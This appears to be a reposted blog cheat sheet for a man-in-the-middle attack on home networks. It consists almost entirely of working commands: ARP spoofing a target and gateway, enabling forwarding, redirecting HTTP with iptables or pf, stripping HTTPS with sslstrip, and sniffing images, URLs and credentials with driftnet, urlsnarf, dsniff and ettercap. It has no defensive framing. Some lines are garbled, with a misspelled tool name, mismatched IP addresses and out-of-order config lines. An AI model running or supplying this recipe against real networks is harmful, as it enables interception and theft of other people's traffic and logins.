Man-in-the-middle attack and data acquisition on home routers.
# Enable port forwarding
echo 1 >/proc/sys/net/ipv4/ip_forward
# Monitor images
driftnet -i eth0 -d ~/Desktop/pic -a
driftnet -i eth0
# Monitor URLs
urlsnarf -i eth0
# Forward through iptables
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>
# Spoof target machine
arpspoof -i eth0 -t 192.168.2.165 192.168.2.1
# Spoof gateway
arpspoof -i eth0 -t 192.168.2.1 192.168.2.150
# Filter spoofing
arpspoof -i eth0 -c own -t 192.168.2.213 192.168.2.1
## sslstrip -l <yourListenPort>
# Intercept data
sslstrip
## Start packet capture tool
wirewhark
rdr pass on en0 proto tcp from any to any port 80 -> 127.0.0.1 port 8080
sslstrip -l 8080
# Modify /etc/pf.conf file, add the following line at the appropriate location
rdr-anchor "http-forwarding"
load anchor "http-forwarding" from "/etc/pf.anchors/http"
# Restart the packet filter, enter the following commands
sudo pfctl -ef /etc/pf.conf
sudo pfctl -E
# Enable forwarding
sudo sysctl -w net.inet.ip.forwarding=1
# Check forwarding status
sudo sysctl -a | grep forward
# arpspoof -i en0 -t (target IP) (gateway IP)
arpspoof -i en0 -t 10.196.17.58 10.196.17.1
arpspoof -i en0 -t 10.196.17.1 10.196.17.24
# Capture traffic
sudo ettercap -G
# Select target1
# Gateway spoofing
dsniff -i eth0
ip.src==192.168.2.213 and http
Please indicate the source when reprinting. This article is licensed under the CC4.0 license.